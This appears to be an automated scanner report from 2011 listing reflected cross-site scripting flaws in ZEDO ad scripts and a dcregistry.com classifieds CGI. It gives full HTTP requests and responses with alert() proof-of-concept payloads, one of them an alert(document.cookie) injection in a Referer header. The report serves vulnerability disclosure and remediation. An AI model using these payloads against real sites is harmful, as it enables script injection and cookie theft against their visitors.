Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-401/d3/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19b1'-alert(1)-'4b1450f596b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?a19b1'-alert(1)-'4b1450f596b=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 941 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0daa-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=253 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:46 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd682'%3balert(1)//8194c718852 was submitted in the q parameter. This input was echoed as fd682';alert(1)//8194c718852 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=fd682'%3balert(1)//8194c718852&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=526 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:00 GMT Connection: close Content-Length: 1987
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='fd682';alert(1)//8194c718852';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=fd682';alert(1)//8194c718852;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae34c"%3balert(1)//b23cf797565 was submitted in the q parameter. This input was echoed as ae34c";alert(1)//b23cf797565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=ae34c"%3balert(1)//b23cf797565&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1479B1099,2#702971|0,1,1;expires=Fri, 18 Feb 2011 18:00:59 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=527 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:59 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='ae34c";alert(1)//b23cf797565';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=ae34c";alert(1)//b23cf797565;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35817"%3balert(1)//c76b7e8cf54 was submitted in the $ parameter. This input was echoed as 35817";alert(1)//c76b7e8cf54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=35817"%3balert(1)//c76b7e8cf54&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:35817";alert(1)//c76b7e8cf54;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:52 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=534 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:52 GMT Connection: close Content-Length: 2038
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',35817";alert(1)//c76b7e8cf54';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,35817";alert(1)//c76b7e8cf54;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7468b'%3balert(1)//803ecb61dff was submitted in the $ parameter. This input was echoed as 7468b';alert(1)//803ecb61dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=7468b'%3balert(1)//803ecb61dff&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:7468b';alert(1)//803ecb61dff;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:53 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=533 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:00:53 GMT Connection: close Content-Length: 2038
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',7468b';alert(1)//803ecb61dff';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,7468b';alert(1)//803ecb61dff;z="+Math.random();}
4.20. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-401/d3/jsc/fmr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb90e'-alert(1)-'40d04a4f8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?fb90e'-alert(1)-'40d04a4f8f9=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 942 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=249 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:50 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e4b"%3balert(1)//9f07af1dcbc was submitted in the q parameter. This input was echoed as 69e4b";alert(1)//9f07af1dcbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=69e4b"%3balert(1)//9f07af1dcbc&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:49 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=48 Expires: Wed, 19 Jan 2011 18:01:37 GMT Date: Wed, 19 Jan 2011 18:00:49 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='69e4b";alert(1)//9f07af1dcbc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=69e4b";alert(1)//9f07af1dcbc;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59624'%3balert(1)//65aac50a934 was submitted in the q parameter. This input was echoed as 59624';alert(1)//65aac50a934 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=59624'%3balert(1)//65aac50a934&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:50 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=47 Expires: Wed, 19 Jan 2011 18:01:37 GMT Date: Wed, 19 Jan 2011 18:00:50 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='59624';alert(1)//65aac50a934';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=59624';alert(1)//65aac50a934;z="+Math.random();}
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload bc39f<script>alert(1)</script>6e8f0f5d54e was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=personalsbc39f<script>alert(1)</script>6e8f0f5d54e HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:43 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 532
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/personalsbc39f<script>alert(1)</script>6e8f0f5d54e.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s ...[SNIP]...
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload fe27a<script>alert(1)</script>35aefdde02f was submitted in the db parameter. This input was echoed unmodified in the application's response.
